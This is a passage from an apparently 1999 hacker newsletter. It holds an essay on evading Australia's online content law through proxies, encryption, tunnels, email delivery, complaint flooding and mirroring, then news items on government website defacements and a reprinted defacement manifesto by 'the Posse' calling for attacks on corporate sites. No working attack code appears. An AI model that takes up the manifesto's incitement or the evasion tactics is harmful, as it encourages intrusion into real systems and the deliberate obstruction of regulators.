content". All rhetoric aside about "big brother" and how this legislation spells the end of free speech in this country, it is acknowledged
by most if not all participants in the debate about this legislation that, for a number of reasons it will be very difficult if not impossible
to effectively stem the tide of what the government calls "illegal and offensive material".
This paper has one aim - to highlight the futility of attempting such content regulation by explicitly describing the legal means by which
citizens can evade the provisions within the legislation.
Warning
I believe that all Australian laws should be in language understandable by ordinary Australians. This paper is my interpretation of the
Broadcasting Services Amendment (Online Services) Act 1999 and should not be construed as anything more than this. Just as I believe
what you view on the Internet should be your own responsibility, if you choose to follow any of my suggestions here, it's your sole
responsibility to deal with any adverse or unforseen consequences of those actions. That said, if you disagree with anything I've said
here, feel free to contact me.
The means of evasion...
I should point out that most of these means of evasion assume that the content you want to access is outside the country and
therefore beyond the effective reach of the "take down notices" mentioned in the legislation.
Use an alternate proxy network - connect to a different proxy server on a non-standard port
Mask web content before entering the proxy network - change some words, change some server names
Encrypt the content - they can't regulate what they can't read
Encrypt web content before it enters the proxy network
Use an encrypted VPN/tunnel for streaming content
Distribute content by means of a "company" to your "employees"
Offer on-demand, point-to-point email access to content
Flood the ABA with legitimate, appropriate complaints
Use a "recognised alternative access prevention arrangement"
Mirror content so widely as to prevent effective enforcement of the legislation
Use an alternate proxy network
You should be able to access any content you wish by connecting to a proxy server network outside Australia either directly from your
browser on a port other than 80, 3128 or 8080 (the most popular proxy server ports, and the ones most likely being transparently
proxied) or using a Squid-like cache internal to your network that accesses a proxy hierarchy outside Australia on a port other than
3130 (the standard ICP port).
This assumes that the government does not mandate the use of a packet level filter, regardless of how ineffective one might be at
locating banned content in a stream of data passing through it and preventing access to it. If it were to do this, it would most likely be
done using an industry standard able to be defined under Part 5 of the legislation.
Transparent proxying, for those unsure of it's meaning, is the process of redirecting a users' outgoing web content request through a
network switch capable of what's called layer 3 routing. Layer 3 routing enables the network switch to invisibly redirect the web
content request away from the intended destination into a proxy server which then fetches the web content for you, assuming it's not
been configured to block certain URLs or certain media types (mpg movies, for example).
Mask web content before entering the proxy network
Assume your ISP uses transparent proxying methods to pass all web content through a filter of some kind. What about masking the web
content in some way at the server (aka "internet host") end such that when it passes unhindered through the proxy network, your
computer can unmask the information, making it visible to you . A basic example of this, but one that only masks the URL you're trying
to access is accessible here. The Youth Alliance against Internet Censorship offers information on software for your computer that can
disable a proxy server here.
Encrypt the content before it enters the proxy network
Above, I mentioned the ability to mask content on the server side before it passes through the proxy network. The same concept can
applied to any Internet content using encryption. This could be achieved using a traditional SSL-based transaction between a server
and your own computer, by means of a PGP-based transaction with an appropriately configured server, or by using any other form of
encryption that prevents decryption by anyone other than yourself.
Use an encrypted VPN/tunnel for streaming content
A VPN is a Virtual Private Network. It allows physically separate networks to operate in a homogenous fashion by encrypting packets at
one particular "endpoint", tunnelling them (sending in a point-to-point fashion) across the internet, then decrypting them at some other
"endpoint", protecting the information being passed between the two networks. A typical use of a VPN is by a company with offices in
different cities or in different countries. VPN technologies are offered by a number of major networking vendors including Cisco, Bay
Networks and Ascend, though usually with a fairly high price tag attached. At a more grass roots level, end users can download and
use a product called SSH (Secure Shell) to give them secure network access to UNIX shells and set up encrypted tunnels between two
hosts. For Linux users, the kernel comes with tunnelling code built-in and can be made secure with IPSEC patches available from the
Netherlands.
Distribute content by means of a "company" to your "employees"
The legislation allows for information to be distributed to an end-user provided they are within your "immediate circle" and is described
in Subclause 9(1-4):
9 Supply to the public
(1) This clause sets out the circumstances in which an Internet carriage
service is taken, for the purposes of subclause 8(1), to be supplied to the
public.
(2) If:
(a) an Internet carriage service is used for the carriage of information
between 2 end-users; and
(b) each end-user is outside the immediate circle of the supplier
of the service;
the service is supplied to the public.
Note: If a company makes Internet content available for access on the Internet,
and an individual obtains access to the content using an Internet carriage
service, the company and the individual are end-users in relation to the carriage
of the content by the Internet carriage service.
(3) If:
(a) an Internet carriage service is used to supply point-to-multipoint
services to end-users; and
(b) at least one end-user is outside the immediate circle of the supplier
of the service;
the service is supplied to the public.
(4) If:
(a) an Internet carriage service is used to supply designated content services
(other than point-to-multipoint services) to end-users; and
(b) at least one end-user is outside the immediate circle of the supplier of
the service;
the service is supplied to the public.
The thing to note here are the words "immediate circle". Jumping back up in the document to the definition, we note it refers to the
Telecommunications Act of 1997. Jumping to the (rather long) definition in that legislation, we find that your "immediate circle" refers to
employees if you are a company:
Immediate circle
SECT. (1) For the purposes of this Act, a person's "immediate circle" consists of the person, together with the following persons:
(a) if the person is an individual--an employee of the individual;
continued...
In theory, using this aspect of the legislation, you could create a company and employ individuals interested in the banned content you
have on offer. Far fetched, but apparently possible. The definition, interestingly, would also allow a University to offer banned content
to it's employees and students.
Offer on-demand, point-to-point email access to content
In the early days of the commercial internet, before the invention of the World Wide Web, not everybody had access to the FTP sites
that contained lots of information. The way most people got around this restriction/limitation was using a service called ftp-by-email.
To use it, you'd send an email to a certain address containing a sequence of standard ftp commands, as follows:
From: 2600 Webmaster (webmaster@2600.org.au)
To: FTP-By-Email (ftpmail@ftp.sunet.se)
open mirror.aarnet.edu.au
cd pub/linux/kernel
cd v2.2
binary
get README
quit
Following the receipt of this email, any files you had requested with a "get" command would be emailed back to you. A rundown of how
this (still) works can be found here.
Now, referring to the legislation, we find the following definition of "Internet content":
Internet content means information that:
(a) is kept on a data storage device; and
(b) is accessed, or available for access, using an Internet carriage service;
but does not include:
(c) ordinary electronic mail; or
(d) information that is transmitted in the form of a broadcasting service.
and of "ordinary electronic mail":
ordinary electronic mail does not include a posting to a newsgroup.
Are you thinking what I'm thinking? Assuming the content is not accessible to the public by any means other than point-to-point,
user-requested email, you could be very well within the law to offer content that is otherwise banned in any other forum.
Flood the ABA with legitimate, appropriate complaints
I'll start describing this means of evasion by displaying Clause 26. Take particular note of Subclause 26(2b):
26 Investigation of complaints by the ABA
(1) The ABA must investigate a complaint under Division 1.
(2) However, the ABA need not investigate the complaint if:
(a) the ABA is satisfied that the complaint is:
(i) frivolous; or
(ii) vexatious; or
(iii) not made in good faith; or
(b) the ABA has reason to believe that the complaint was made for the purpose, or for
purposes that include the purpose, of frustrating or undermining the effective
administration of this Schedule.
(3) The ABA must notify the complainant of the results of such an investigation.
(4) The ABA may terminate such an investigation if it is of the opinion that it does not have
sufficient information to conclude the investigation.
Okay, so they thought people might flood them with frivolous complaints... Fair enough. But isn't it the case that every site that is not
investigated by the ABA remains unregulated and therefore free? I'm sure you can put two and two together on this one.
Use a "recognised alternative access prevention arrangement"
I'll start this one by displaying two rather lengthy but important subclauses of the legislation, both of which describe possible means to
evade content regulation by installing (but presumably not using) one of the currently-available end-user filtering pieces of software.
Firstly Subclause 40(4-7):
40 Action to be taken in relation to a complaint about prohibited content hosted outside Australia
(1) - (3)
Recognised alternative access-prevention arrangements
(4) An Internet service provider is not required to comply with a standard access-prevention
notice in relation to a particular end-user if access by the end-user is subject to a
recognised alternative access-prevention arrangement(as defined by subclause (5)) that
is applicable to the end-user.
(5) The ABA may, by written instrument, declare that a specified arrangement is a recognised
alternative access-prevention arrangement for the purposes of the application of this Division
to one or more specified end-users if the ABA is satisfied that the arrangement is likely to
provide a reasonably effective means of preventing access by those end-users to prohibited
content and potential prohibited content.
Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
(6) The following are examples of arrangements that could be declared to be recognised alternative
access-prevention arrangements under subclause
(5):
(a) an arrangement that involves the use of regularly updated Internet content filtering software;
(b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service.
(7) An instrument under subclause (5) is a disallowable instrument for the purposes of section 46A
of the Acts Interpretation Act 1901
and Subclause 60(3-8):
60 Matters that must be dealt with by industry codes and industry standards
(1) - (2)
Designated alternative access-prevention arrangements
(3) An industry code or an industry standard may provide that an Internet service provider is not
required to deal with Internet content notified under paragraph 40(1)(b) of this Schedule or
clause 46 by taking steps to prevent particular end-users from accessing the content if access
by the end-users is subject to an arrangement that is declared by the code or standard to be a
designated alternative access-prevention arrangement for the purposes of the application of this
clause to those end-users.
(4) An industry code developed by a body or association must not declare that a specified arrangement
is a designated alternative access-prevention arrangement for the purposes of the application of
this clause to one or more specified end-users unless the body or association is satisfied that the
arrangement is likely to provide a reasonably effective means of preventing access by those end-users
to prohibited content and potential prohibited content.
Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
(5) An industry standard made by the ABA must not declare that a specified arrangement is a designated
alternative access-prevention arrangement for the purposes of the application of this clause to one
or more specified end-users unless the ABA is satisfied that the arrangement is likely to provide a
reasonably effective means of preventing access by those end-users to prohibited content and potential
prohibited content.
Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.
(6) The following are examples of arrangements that could be declared to be designated alternative
access-prevention arrangements:
(a) an arrangement that involves the use of regularly updated Internet content filtering software;
(b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service.
(7) For the purposes of this Schedule, if an industry code:
(a) deals to any extent with procedures to be followed by Internet service providers in dealing
with Internet content notified under paragraph
40(1)(b) of this Schedule or clause 46; and
(b) makes provision as mentioned in subclause (3);
then:
(c) the code is taken to deal with the matter set out in paragraph (2)(d); and
(d) the code is taken to be consistent with subclause (2).
(8) For the purposes of this Schedule, if an industry standard:
(a) deals to any extent with procedures to be followed by Internet service providers in dealing
with Internet content notified under paragraph
40(1)(b) of this Schedule or clause 46; and
(b) makes provision as mentioned in subclause (3);
then:
(c) the standard is taken to deal with the matter set out in paragraph (2)(d); and
(d) the standard is taken to be consistent with subclause (2).
Now, if you've made it through all of that, you'll note a single key thing - that subject to appropriate industry codes and standards, it
may be possible to have an unfiltered internet feed delivered to you if you have an end-user filtering system installed on your computer.
The means of evasion here? Turn the filter off. Not exactly rocket science, is it?
Mirror content so widely as to prevent effective enforcement of the legislation
As with the two previous means of evasion, I will begin by displaying several pieces of the legislation. First up is Clause 36:
36 Anti-avoidance-special take-down notices
If:
(a) an interim take-down notice or a final take-down notice relating to particular Internet
content is applicable to a particular Internet content host; and
(b) the ABA is satisfied that the Internet content host is hosting in Australia, or is proposing
to host in Australia, Internet content (the similar Internet content) that is the same as,
or substantially similar to, the Internet content identified in the interim take-down notice
or the final take-down notice, as the case may be; and
(c) the ABA is satisfied that the similar Internet content is prohibited content or potential
prohibited content;
the ABA may give the Internet content host a written notice (a special take-down notice) directing the
host not to host the similar Internet content at any time when the interim take-down notice or final
take-down notice, as the case may be, is in force.
Clause 36 appears to apply to mirrored information or, quite possibly, a website consisting of different layout/text but identical images.
I'll now move onto Clauses 46 and 47:
46 Anti-avoidance-notified Internet content
(1) If:
(a) particular Internet content has been notified to Internet service providers as mentioned
in Paragraph 40(1)(b) of this Schedule; and
(b) the notification has not been withdrawn; and
(c) the ABA is satisfied that Internet content (the similar Internet content) that is the same
as, or substantially similar to, the first-mentioned Internet content is being hosted
outside Australia; and
(d) the ABA is satisfied that the similar Internet content is prohibited content or potential
prohibited content; and
(e) a code registered, or standard determined, under Part 5 of this Schedule deals with the
matters referred to in subclause 60(2);
the ABA must notify the similar Internet content to Internet service providers under the designated
notification scheme set out in the code or standard, as the case may be.
(2) If:
(a) particular Internet content is notified to Internet service providers as mentioned in
Paragraph 40(1)(b) of this Schedule; and
(b) as a result of the application of subclause (1) to that content, the ABA notifies similar
Internet content to Internet service providers in accordance with subclause (1); and
(c) the notification of the first-mentioned content is withdrawn;
the notification of the similar Internet content is taken to have been withdrawn.
(3) If:
(a) a notification of Internet content is withdrawn under subclause (2); and
(b) a code registered, or standard determined, under Part 5 of this Schedule deals with the
matters referred to in subclause 60(2);
the ABA must notify the withdrawal to Internet service providers under the designated notification
scheme set out in the code or standard, as the case may be.
47 Anti-avoidance-special access-prevention notice
(1) If:
(a) a standard access-prevention notice relating to particular Internet content is applicable
to a particular Internet service provider; and
(b) the ABA is satisfied that the Internet service provider is supplying an Internet carriage
service that enables end-users to access Internet content (the similar Internet content)
that is the same as, or substantially similar to, the Internet content identified in the
standard-access prevention notice; and
(c) the ABA is satisfied that the similar Internet content is prohibited content or potential
prohibited content; the ABA may give the provider a written notice (special access-prevention
notice) directing the provider to take all reasonable steps to prevent end-users from accessing
the similar Internet content at any time when the standard access-prevention notice is in force.
Note: The ABA may be taken to have given a notice under this clause-see clause 51.
(2) For the purposes of subclause (1), in determining whether particular steps are reasonable, regard must be had to:
(a) the technical and commercial feasibility of taking the steps; and
(b) the matters set out in subsection 4(3).
(3) Subclause (2) does not, by implication, limit the matters to which regard must be had.
recognised alternative access-prevention arrangements
(4) An Internet service provider is not required to comply with a special access-prevention notice in
relation to a particular end-user if access by the end-user is subject to a recognised alternative
access-prevention arrangement (as defined by subclause 40(5)) that is applicable to the end-user.
The means of avoidance here would be purely and simply mirroring content so widely and in so many derivative (and possibly dissimilar)
forms that even the process of generating take-down notices and notifying internet services providers would bog down the ABA and
the OFLC.
Commentary
The intent of this legislation, as stated by the government, was to prevent children accessing "illegal and offensive" material on the
Internet. More specifically, they made reference in various forums to pornographic material. My concern is not that responsible adults
will be prevented from accessing this material, but that the legislation does not explicitly define what else might be regulated on the
whim of a misguided Government minister or influential moral crusader within the ranks of the ABA or OFLC.
One example of what might be banned is the BugTraq mailing list. This list contains "full disclosure" discussions of computer software
bugs, including in some cases explicit instructions on how to break into computers. What might be easily overlooked in any such
government review of this material is the fact that in most cases, such information is accompanied by further instructions on how to
secure any vulnerable computers.
Another oft-quoted example of how an overzealous filter might exclude important content is in the area of health. Breast cancer.
Sexually-transmitted diseases. Contraception. If it's got any of the words filtered by Senator Alston's favoured filtering solution, iFilter
(a number of them listed here), chances are your friendly neighbourhood ISP will be told to ban it long before you see it.
Conclusion
As you can see, there's a number of loopholes in the legislation that our government has pushed through parliament, and most of them
allow a mildly intelligent citizen to quite legally evade any form of content regulation. Far from suggesting that this legislation should be
heavier-handed than it already is in restricting people from accessing the information they want, I am suggesting that it should have
been thrown out by the Paliament on the basis that it is fundamentally flawed and unenforceable.
Instead, and without fear tactics or moralist rhetoric, the Government could have instituted a public education campaign informing
parents about the need to restrict unsupervised/unfiltered access to the Internet with young children (5-13) and begin a dialogue
about personal responsibility and self moderation with older ones (13 and up). As a young person that has grown up in the midst of
computers and communication technologies, I believe this would have achieved a much more productive outcome.
Feedback
Given that this is a layperson's analysis of the legislation, I invite any and all comment from similarly concerned citizens, and in
particular citizens familiar with legal matters that may be able to provide further insight.
Please feel free to make comments to webmaster@2600.org.au.
@HWA
08.0 Can the CIA break into banks?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Can CIA Break Into Banks?
contributed by Weld Pond
Last week Newsweek reported that the CIA was
planning to electronically break into unnamed banks to
get at Slobodan Milosevic's money. How realistic is this?
Is it possible and if so what are the international
implications? MSNBC takes a look at these questions and more.
MSNBC
http://www.msnbc.com:80/news/274526.asp
Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
MSNBC;
Experts argue plan to raid Milosevics bank accounts would
do more harm than good
By Bob Sullivan
MSNBC
May 28 It sounded like a Tom Clancy spy novel.
Newsweek reported last week that the CIA was
planning to tinker with international bank
accounts full of Slobodan Milosevics money
just another way of getting under the Yugoslav
presidents skin. Information warfare
experts
disagree about the feasibility of such a
cyberattack. But theres little disagreement the
U.S. stands to lose much more than it might gain
from firing the first volley in such an infomation
war. In fact, some believe damage has already
been done.
THE NEWSWEEK STORY RAISED several issues:
What international laws would govern a U.S.-backed attack
on a bank in a third-party nation? Is such an attack feasible
in the first place? What kind of retaliation might U.S.
citizens, and their bank accounts, face? But most important,
what does even the possibility of such an attack do to the
integrity of international banking systems?
The story on the cyberattack fact, fiction or
somewhere in between could already have put the U.S.
at risk, said Kawika Daguio, executive vice president of the
Financial Information Protection Association.
Banking systems hinge on public confidence. You put
the money in; youre confident youll be able to take the
money out. If theres any hint you might not be able to get at
your money, youd withdraw it. Any attack on the integrity
of a banking system anywhere particularly when
retaliation seems like such an obvious possibility chips
away at public confidence.
It bothers me because we have had conversations
with the defense and intelligence community. We thought
this was off the table, Daguio said. Weve had discussions
with rather senior policy-makers. We thought they
understood the importance of protecting public confidence
in the payment system.
But retaliation by foreign agents might be just one
source of insecurity for U.S. account holders. Theres
another: If the government can and is willing to tinker with
foreign accounts, what will stop it from tinkering with mine?
Could U.S. agents hijack Milosevics money, allegedly
stashed away in foreign banks? Yes and no.
Experts agree that the CIA has had the know-how to
control bank accounts for years, through old-fashioned
non-cyber methods, such as coercing bank authorities, or
even through legal methods such as freezing accounts.
On the other hand, its not easy when the target
knowns whats coming. According to MSNBC analyst Bill
Arkin, the international community, including UNSCOM, is
still trying to get its hands on Saddam Husseins assets.
And such real-world tactics are a far cry from the
cyberwar image of a few CIA hackers sitting at a keyboard
moving around money thanks to an Internet connection and
some wits. Theres disagreement about how possible that
might be.
The audits we have performed tell us [banks] are not
invulnerable, says a security expert identifying himself as
Space Rogue. Rogue works at L0pht Heavy Industries,
which hires out to hack corporate computer systems to test
their vulnerability. Banks have a little more security in
place, but that security is still not at a level where its
unbreakable. While money systems arent connected to the
public Internet, sometimes they have a modem dangling off
for remote access, or they use cryptography, but not
correctly, he said.
Others suggest cracking a bank that holds Milosevic
money outside the more traditional methods is nearly
impossible.
I deal in probabilities, and Ive never seen it, said a
man identifying himself as Louis Cipher, a principal investor
in Infowar.com. Cipher is also in charge of security at what
he says is the sixth-largest brokerage in America. He
suggested very few individuals have the skills necessary to
tunnel from an Internet connection through mainframe
systems in banks in fact, a team of specialists and inside
information would be required.
Youd have to be an applications specialist to even
navigate to a screen, he said. Youre talking well beyond
the skills of hackers. It would have to be an insider working
with Job Control Language sitting on the mainframe. The
only one who would have that ability other than the U.S.
government would be organized crime.
And Cipher is skeptical about the U.S. governments
ability to hire and hold the brightest minds in the security
industry since no government agency can match the lure
of stock options offered by a high-tech firm.
Still, even the possibility of the U.S. using a wired
computer to move Milosevics money drew swift reaction
from information warfare observers. Even hacker groups
protested the notion, with a hacker calling himself sixtoed
setting up a Web page in protest. The reason: Since the
U.S. relies more on technology and information than any
other nation, it stands to lose the most from such a
cyberwar.
I am not one for an information arms race, said Frank
Cilluffo, senior analyst at the Center for Strategic and
International Studies in Washington. We will lose that
race.... Were a hell of a lot more susceptible to retaliation.
The defensive implications outweigh the offensive
implications.
Anyone can build up an information warfare capability,
Cilluffo said. And its much more like guerrilla war than
nuclear war its easy for the enemy to hide, and theres
no real deterrent. Therefore, retaliation could be swift and
indiscriminate.
In addition, there is a general principle among security
experts suggesting once a systems security is
compromised, its much easier to compromise a second
time. So the U.S. could very well be paving the way for
retribution.
WHY NO DENIALS?
Fear of such retaliation attempts, or even the
perception of such retaliation attempts, drove Daguio to
start calling his friends on the intelligence community to
complain as soon as the Newsweek story hit. He has yet to
receive the reassurance he was hoping for.
If its true or its just leaks, its bad to have the story
out there, Daguio said. I have yet to have anyone tell me
Dont worry, everythings OK. ... If they havent done
anything, the most appropriate thing to do is to come out
and say theyre not doing it.
The CIA isnt doing that; a spokesperson told
MSNBC the agency couldnt comment on its activities, but
one source familiar with U.S. intelligence capabilities tells
MSNBC to be very skeptical of the Newsweek story.
Meanwhile, opening the Pandoras box of cyberwar
would lead to a series of yet-to-be answered questions.
International law isnt ready to handle such conflicts, says
Cilluffo so if the U.S. broke into a bank in Cyprus, what
laws would govern that act? And could the compromised
bank sue the U.S. government?
What are the rules of engagement here? Cilluffo
asked. What is game, what is not game? This may be a
harbinger of how we prosecute and wage war in the future.
@HWA
09.0 Emmanuel Goldstein Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by cult_hero
Adam Peneberg of Forbes writes a good long article
after interviewing the editor of 2600 and the on air
personality of "Off the Hook", Emmanuel Goldstein.
Forbes
http://www.forbes.com/penenberg/
RECENTLY, I met with Emmanuel Goldstein, publisher of the hacker
zine 2600, at the New York City radio station WBAI. 2600, a slender
volume containing articles about hacking, phone phreaking and tips
for pirating videogames, has been around since 1984. Goldstein, a
mainstay in the hacker world since he was a teenager, has hosted "Off
the Hook," a weekly radio program, for more than ten years.
When I asked Goldstein, whose real name is Eric Corley, which
name he preferred, his response was, "Call me whatever you want,
but the reason I changed it is because I didn't like Eric Corley.
The name Emmanuel Goldstein, which comes from a character in
Orwell's 1984, suits me much better--and many more people know
me as Emmanuel."
Goldstein, 39, long, scraggly hair streaked with gray
poking out from under a 2600 baseball cap, was
enmeshed in hacker culture long before there was an
information superhighway. In 1983 he broke into
computer systems at NASA, Coca-Cola, Raytheon
and the Executive Office of the President of the United
States. How was he able to get in? They were all
using the same E-mail system, and Goldstein
discovered that if he typed the letter "A," he could get
the default password, which would allow him to gain
access to the system. He then used these
companies' mail systems to send E-mail to other
hackers.
Initially, he was charged with a whopping ten counts of
wire fraud, each with a possible sentence of five years.
This was the first time, he says, he experienced the
government hyping the threat of computer crime.
"I freely admitted what I did: It was an offense, but not
a crime," Goldstein says. "I showed them what was
wrong with their system: "'Don't use the letter 'A' for
your default password,'" I told them. "They gave me
probation for a year and I had to pay $200 for
computer time. Then they let me go."
These days, Goldstein spends most of his time
working on behalf of his friend, Kevin Mitnick, the
hacker poster boy who has been in prison for more
than four years for illegally copying and hoarding
proprietary software. Goldstein helps run two web
sites dedicated to the cause, and is in the process of
filming a documentary about Mitnick.
"There is a lot of fear and paranoia about hackers, and
it's not getting any better," he says. "The government
needs a threat in order to justify its existence, and we
are a convenient scapegoat, since most people really
don't understand what we do. They claim that hackers
do this and do that, they spread viruses and wreak
havoc and destroy systems, and this is hard to
dispel."
For instance, President Clinton, who has proposed
earmarking some $1.5 billion to fight cyberterror
threats, said in a January speech at the National
Academy of Sciences: "We already are seeing the
first wave of deliberate cyber attacks--hackers break
into government and business computers, stealing and
destroying information, raiding bank accounts, running
up credit card charges, extorting money by threats to
unleash powerful computer viruses."
It sounds like Clinton may have seen too many Keanu
Reeve's flicks. Most companies that are hacked suffer
web site graffiti. This means the victim company is
forced to spend money to improve its security.
Embarrassing? Certainly. A threat to business?
Hardly, and why was the company's security so lax in
the first place?
While it is true that the Pentagon is hacked nearly
every hour, that doesn't mean these teenagers (and
that's who most of the hackers who go after "big
game" like American military sites are) actually come
away with anything. And the part about hackers
extorting money by threatening to release nasty
computer viruses sounds like it could have written by
Stephen Glass, the former associate editor of The
New Republic, who was busted for fabricating stories.
Yet, each time the hacker menace is blown out of
proportion means the cause of the problem is not
addressed. Law enforcement can either go after the
estimated one million hackers out there in
cyberspace, most of them being "script kiddies"
possessing basic skills at best, or it could insist that
companies that release buggy software chock full of
security holes take responsibility for the many holes in
their products.
If you bought a car that could be hijacked with
off-the-shelf keys made available over the Internet, you
might be tempted to sue the automaker for not doing
more to secure the vehicle. Yet, since software
companies don't technically sell their products, they
"lease" them, they are not liable. If they were, they
wouldn't release products that could be so easily
penetrated by hackers.
But companies like Microsoft have lobbyists. Hackers
don't. So don't expect Congress to do much.
Goldstein and Mitnick, who to this day is listed as a
staff writer on 2600's masthead, became friends in
1989, after Kevin Mitnick's first go around in solitary
confinement. (The court, without proof, was afraid that
Mitnick could somehow whistle into a telephone and
launch nuclear missiles.) While Mitnick, who says he
was devastated by his eight months held in a cell no
larger than a bathroom, went on the lam from the FBI
in the early 1990s, afraid he would be put back in
solitary, he called Goldstein almost everyday.
"The day Kevin was arrested, I'd just missed a phone
call from him," Goldstein says. "I was sad he hadn't
followed my advice to leave the country. I knew what
they would do to him."
In the coming months, Takedown, a film based on the
book by New York Times reporter John Markoff and
Tsutomu Shimomura that details the capture of Kevin
Mitnick, is scheduled to come out. Goldstein was able
to gain an advance copy of the screenplay and
complained bitterly over the evil way Mitnick was
portrayed. After Goldstein led a protest outside of
Miramax's corporate headquarters, the company made
changes to the script.
"It's still crap," he says, "but its more well-rounded
crap."
Does Goldstein, who freely admits his hacking skills
are modest at best, have any pearls of wisdom to offer
about hacking?
"The people I hang out with know far more about
technology than I do. When dealing with hackers, he
cautions, "always assume you're being lied to."
@HWA
10.0 DOD Unplugs From Net as Another Gov Site Gets Hit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by info-warrior
In a move spokespeople are calling "proactive" (yeah,
right) the Department of Defense has announced that it
will be pulling its systems off the net to upgrade
security and install a firewall. (About damn time.) The
White House has also issued a stern warning to would
be crackers saying "You will be caught". Interesting
quote from the Washington Post "Securing government
Web sites against attack is difficult because the sites
are designed for open access." What makes them any
more difficult to secure or more open than a corporate
web site?
C|Net
http://www.news.com/News/Item/0,4,37257,00.html?owv
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2268574,00.html?chkpt=hpqs014
Washington Post
http://www.washingtonpost.com/wp-srv/national/daily/june99/hackers02.htm
And the War Continues
The latest victim is Brookhaven National Labs. The main
web page for the site was defaced late last night by the
"Posse". They at least left an interesting message.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
FBI Crackdown nets 20+ Script Kiddies
The Posse would like to take this opportunity to personally thank the script kiddies
who keep throwing themselves at the federal government like insects to a buglight.
While you have been keeping the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix)
busy tracking down 14 year old hacker hopefuls; we have spent our time burrowing ourselves
deep within Corporate America.
Ecosystems do not grow without antagonists. The internet (like it or not) has become a
virtual ecosystem that would wither and die were it not for the intervention of hackers.
Corporate America has entered this ecosystem like a viral fungus, growing ugly clusters of
.com decay, spreading misinformation like wildfire and causing the natural predators to be
removed from the ecosystem in which they provide a necessary function.
Corporate America must be removed.
It's us or them.
Take a look at the concrete wastelands that Corporate America has built upon the earth
outside your windows. Beneath that concrete there is soil wasted, soil that breeds life.
They are trying to do the same thing to the internet.
Go outside and try to breathe for just a moment... That stale thickness in the air that
Threatens to choke you is the poison spewing from their smokestacks... Did you just cough?
The phlegm in your throat are their poisons and do you charge them rent ? Did you charge
them storage fees for acting as a receptacle for their toxic waste?
They are destroying the world we built to escape the one they have already destroyed!
Corporate America will trade 10 years (minimum) of your life in exchange for another $10
in profits. Their poisons, their stifling concrete morgues, their so called "progress"...
They never knew the rules, they followed you here to stalk you... To bilk you for $10
they came here because you did. Then when you got in the way of their "progress" they
fabricated losses in order to gain FBI attention. They abuse the system and steal your
freedoms.
Do not blame the FBI, they are playing by the rules...
Do not blame the SS, they are playing by the rules...
BLAME CORPORATE AMERICA
BLAME THE GOVERNMENT
BUT QUIT ATTACKING THE FBI AND SECRET SERVICE!
YOU ARE PLAYING BY THEIR RULES WHEN YOU DO THIS!
A COMPUTER CRIMINAL IS ACCEPTABLE TO SOCIETY THAT IS WHY WE HAVE COMPUTER CRIME LAWS
AND PRISONS!
ATTACK CORPORATE AMERICA...
THE RACE BEGINS... NO MORE .COM'S ON THE INTERNET BY Y2K.
SEIZE THE BACKBONES! THEY BELONG To YOU!
CONTROL THE MEDIUMS BY WHICH THESE CORPORATE IDIOTS DO BUSINESS.
H4ppy Th4nksg1v1ng Turk3yz,
The P0sse.
Greets out 2:
Gary Dell'Abate, Scott Charney, Gale Thackeray, Terry Atchley,
Kurt Von Brauch, Don Delaney, Chris Goggans Tsutomu Shimomoura, Justin Tanner Peterson,
John Markhoff, John Perry Barlow, Netta Gilboa, Corey Braun, Peter "HFG" Shipley,
Berferd, Dan Farmer, Wietse Venema, Dale Drew, Joshua Quittner, Stephanie Hanna,
Joe Cuervo and Jim Beam.
Kick in the colostomy bag out 2:
gH, Eric Burns, mosthated, mindphasr, Kevin Mitnick, Kevin Poulsen, Phiber Optik,
John Draper, Emmanuel Goldstein, SOB!, 9X, EL8, #pascal, team spl0it, attrition.org,
Kit Knox, b4b0, AntiOnline, HackerNews.com, Zo0mer, mozy, m1crochip, in0de,
#bolo, Red Knight, slack packet, Israeli Ghost, infam0us, f0rpaxe, HFX international,
kimmy, Rosie O'Donell and all K-MART employees.
C|Net;
White House threatens to punish hackers
By Reuters
Special to CNET News.com
June 1, 1999, 3:35 p.m. PT
WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House
today warned hackers who target federal Web sites that they will be caught and punished.
"There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe
Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do
catch up with them...and these people are prosecuted," he said.
To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate,
the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time
today, said Ken Bacon, the Pentagon's chief spokesman.
"This is much more protective than reactive," Bacon said. "It's looking to the future to prevent the types of problems that the other
agencies" have experienced in recent weeks on their sites, he said.
Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration
and its agencies.
Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet
locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites.
After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites,
including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly
because of an attempt to tamper with it by unidentified hackers, officials said.
In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and
hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity
Agency."
With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional
Internet hacking incidents.
Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday,
seeking his release to a halfway house and an easy probation when he is sentenced on June 14.
Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire
communication.
Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He
also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said.
Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of
